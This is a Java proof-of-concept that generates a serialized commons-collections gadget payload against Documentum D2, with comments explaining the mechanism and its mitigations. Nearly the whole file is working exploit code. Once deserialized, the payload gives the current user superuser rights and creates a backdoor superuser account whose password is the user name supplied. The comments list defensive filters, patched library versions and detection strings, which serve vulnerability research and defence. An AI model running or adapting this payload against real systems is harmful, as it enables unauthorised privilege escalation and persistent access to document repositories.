  1. import java.io.ByteArrayOutputStream;
  2. import java.io.ObjectOutputStream;
  3. import java.lang.reflect.Array;
  4. import java.lang.reflect.Field;
  5. import java.lang.reflect.InvocationHandler;
  6. import java.lang.reflect.Method;
  7. import java.lang.reflect.Proxy;
  8. import java.util.HashMap;
  9. import java.util.Map;
  10.  
  11. import org.apache.commons.collections.Transformer;
  12. import org.apache.commons.collections.functors.ChainedTransformer;
  13. import org.apache.commons.collections.functors.ConstantTransformer;
  14. import org.apache.commons.collections.functors.InvokerTransformer;
  15. import org.apache.commons.collections.map.LazyMap;
  16.  
  17. import com.documentum.fc.client.impl.typeddata.DynamicallyTypedData;
  18. import com.documentum.fc.client.impl.typeddata.ITypedData;
  19. import com.documentum.fc.common.DfId;
  20. import com.documentum.fc.common.IDfId;
  21. import com.documentum.fc.impl.RuntimeContext;
  22. import com.documentum.xerces_2_8_0.xerces.impl.dv.util.Base64;
  23. import com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl;
  24.  
  25. /**
  26. * @author Andrey B. Panfilov <andrey@panfilov.tel>
  27. */
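/**
 * Proof-of-concept payload generator: builds a serialized {@code java.util.HashMap} whose single key is
 * a {@link Proxy} backed by a {@code CompositeInvocationHandlerImpl}, wires a commons-collections
 * {@code LazyMap}/{@code ChainedTransformer} gadget into that handler via reflection, and prints the
 * resulting byte stream Base64-encoded to stdout.
 *
 * <p>Nothing in this class deserializes anything itself; the class name indicates the output is meant
 * for a Documentum D2 consumer that does (not shown here). From a defensive standpoint this is the
 * well-known commons-collections {@code InvokerTransformer} gadget family: the standard mitigations are
 * a JDK deserialization filter ({@code ObjectInputFilter}, JEP 290 / 8u121+), refusing to deserialize
 * untrusted input at all, and commons-collections releases (3.2.2+ / 4.1+) that disable unsafe functor
 * deserialization by default. The literal strings below ({@code dm_user_s}, {@code user_privileges=16},
 * {@code DM_REGISTERED}, {@code flushGlobalCache}) are also usable as detection signatures for this
 * specific payload.
 *
 * <p>Requires Documentum DFC and commons-collections 3.x on the classpath; the reflection helpers at the
 * bottom are generic and stand on their own.
 */
public class DocumentumD2AACBackDoorPoC {

    /**
     * Builds the payload and writes it, Base64-encoded, to stdout.
     *
     * @param args {@code docbase username}; anything else prints a usage line and returns
     * @throws Exception propagated from reflection, serialization and DFC calls
     */
    @SuppressWarnings("unchecked")
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.out.println("Usage: java " + DocumentumD2AACBackDoorPoC.class.getName() + " docbase username");
            return;
        }

        String docbaseName = args[0];
        String userName = args[1];

        // Three ITypedData request objects. Note that userName is concatenated straight into the
        // CREATE statement below (no quoting/escaping of the operator-supplied value).
        ITypedData becomeSuperUserQuery = new DynamicallyTypedData();
        becomeSuperUserQuery.appendString("QUERY",
                "UPDATE dm_dbo.dm_user_s SET user_privileges=16, i_vstamp=i_vstamp+1 WHERE user_name=USER");

        ITypedData createUserQuery = new DynamicallyTypedData();
        createUserQuery.appendString("QUERY",
                "CREATE dm_user object SET user_name='" + userName + "', SET user_login_name='" + userName
                        + "', SET user_source='inline password', SET user_password='" + userName
                        + "', SET user_privileges=16");

        ITypedData createRegisteredQuery = new DynamicallyTypedData();
        createRegisteredQuery.appendBoolean("IS_NEW_OBJECT", true);
        createRegisteredQuery.appendString("OBJECT_TYPE", "DM_REGISTERED");
        createRegisteredQuery.appendInt("i_vstamp", 0);
        createRegisteredQuery.appendString("table_name", "dm_user_s");
        createRegisteredQuery.appendString("table_owner", docbaseName);
        createRegisteredQuery.appendString("owner_name", docbaseName);
        createRegisteredQuery.appendInt("world_permit", 7);
        createRegisteredQuery.appendString("object_name", "dm_user_s");
        createRegisteredQuery.appendInt("owner_table_permit", 15);
        createRegisteredQuery.appendInt("group_table_permit", 15);
        createRegisteredQuery.appendInt("world_table_permit", 15);
        createRegisteredQuery.appendString("r_object_type", "dm_registered");

        // Reflective call chain into DFC's RuntimeContext, expressed as commons-collections transformers
        // so that it is carried inside the serialized graph rather than executed here.
        Transformer getSession = new ChainedTransformer(
                new Transformer[] { new ConstantTransformer(RuntimeContext.class),
                        new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class },
                                new Object[] { "getInstance", new Class[0] }),
                        new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class },
                                new Object[] { null, new Object[0] }),
                        new InvokerTransformer("getSessionRegistry", new Class[0], new Object[0]),
                        new InvokerTransformer("getAllSessions", new Class[0], new Object[0]),
                        new InvokerTransformer("get", new Class[] { int.class }, new Object[] { 0 }), });

        Transformer flushGlobalCache = new ChainedTransformer(new Transformer[] { getSession,
                new InvokerTransformer("flushGlobalCache", new Class[] { String.class }, new Object[] { "user" }) });

        Transformer getDocbaseAPI = new ChainedTransformer(
                new Transformer[] { getSession, new InvokerTransformer("getDocbaseApi", new Class[0], new Object[0]) });

        // Each of the following chains ends in ConstantTransformer(null) so the LazyMap value is null.
        Transformer createUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
                new InvokerTransformer("parameterizedApply",
                        new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
                        new Object[] { "EXEC", DfId.DF_NULLID, createUserQuery, false }),
                new ConstantTransformer(null) });

        Transformer becomeSuperUser = new ChainedTransformer(new Transformer[] { getDocbaseAPI,
                new InvokerTransformer("parameterizedApply",
                        new Class[] { String.class, IDfId.class, ITypedData.class, boolean.class },
                        new Object[] { "EXEC", DfId.DF_NULLID, becomeSuperUserQuery, false }),
                new ConstantTransformer(null) });

        Transformer createRegistered = new ChainedTransformer(
                new Transformer[] { getDocbaseAPI,
                        new InvokerTransformer("parameterizedApply", new Class[] { String.class, IDfId.class,
                                ITypedData.class, boolean.class },
                                new Object[] { "SysObjSave", new DfId("1900000080000001"), createRegisteredQuery, false }),
                        new ConstantTransformer(null) });

        // LazyMap runs its factory transformer on a missing key; the proxy handler below is made to
        // consult this map, which is what ties the transformer chain to proxy dispatch.
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, new ChainedTransformer(
                new Transformer[] { createRegistered, becomeSuperUser, flushGlobalCache, createUser }));
        CompositeInvocationHandlerImpl handler = new CompositeInvocationHandlerImpl();
        // Temporary default handler so the proxy behaves like an empty map while result.put() hashes it;
        // it is cleared again once the map has been built.
        handler.setDefaultHandler(new InvocationHandler() {
            public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
                return method.invoke(new HashMap(), args);
            }
        });

        // lazyMap.get(null);

        Map<Object, Object> result = new HashMap<Object, Object>();
        result.put(createProxy(handler, Map.class), null);
        // classToInvocationHandler is a private field of CompositeInvocationHandlerImpl (no setter), hence
        // the reflective write.
        setFieldValue(handler, "classToInvocationHandler", lazyMap);
        handler.setDefaultHandler(null);

        // In-memory serialization only; the stream is never closed explicitly, which is harmless for a
        // ByteArrayOutputStream but is why flush() is needed before toByteArray().
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(result);
        oos.flush();
        byte[] bytes = baos.toByteArray();
        String payload = Base64.encode(bytes);
        System.out.println(payload);
    }

    /**
     * Creates a dynamic proxy implementing {@code iface} plus any additional {@code ifaces}, dispatching to
     * {@code ih}, loaded by this class's class loader.
     *
     * @param ih     handler that receives every proxied call
     * @param iface  primary interface; the proxy is cast to this type
     * @param ifaces optional further interfaces, in order
     * @return the proxy instance, typed as {@code T}
     * @throws IllegalArgumentException from {@link Proxy#newProxyInstance} if any element is not an interface
     */
    public static <T> T createProxy(final InvocationHandler ih, final Class<T> iface, final Class<?>... ifaces) {
        // Array creation is a plain generic-array literal; Array.newInstance adds nothing here.
        final Class<?>[] allIfaces = new Class<?>[ifaces.length + 1];
        allIfaces[0] = iface;
        System.arraycopy(ifaces, 0, allIfaces, 1, ifaces.length); // no-op when ifaces is empty
        return iface.cast(Proxy.newProxyInstance(DocumentumD2AACBackDoorPoC.class.getClassLoader(), allIfaces, ih));
    }

    /**
     * Looks up a declared field by name on {@code clazz} or, failing that, on each superclass in turn, and
     * makes it accessible.
     *
     * <p>Fix over the original: {@code getDeclaredField} throws {@link NoSuchFieldException} rather than
     * returning {@code null}, so the old {@code field == null} superclass fallback was unreachable and a
     * field inherited from a superclass could never be found.
     *
     * @param clazz     class to start the search from
     * @param fieldName declared field name
     * @return the accessible {@link Field}
     * @throws NoSuchFieldException if no class in the hierarchy declares {@code fieldName}
     * @throws Exception            other reflection failures (e.g. {@code setAccessible} refused by the module system)
     */
    public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
        for (Class<?> current = clazz; current != null; current = current.getSuperclass()) {
            try {
                final Field field = current.getDeclaredField(fieldName);
                field.setAccessible(true);
                return field;
            } catch (NoSuchFieldException ignored) {
                // not declared here; continue with the superclass
            }
        }
        throw new NoSuchFieldException(fieldName + " not found in " + clazz.getName() + " or its superclasses");
    }

    /**
     * Writes {@code value} into the (possibly private or inherited) field {@code fieldName} of {@code obj}.
     *
     * @param obj       target instance; its runtime class starts the field search
     * @param fieldName name of the field to set
     * @param value     new value
     * @throws Exception if the field cannot be found or set (see {@link #getField})
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

}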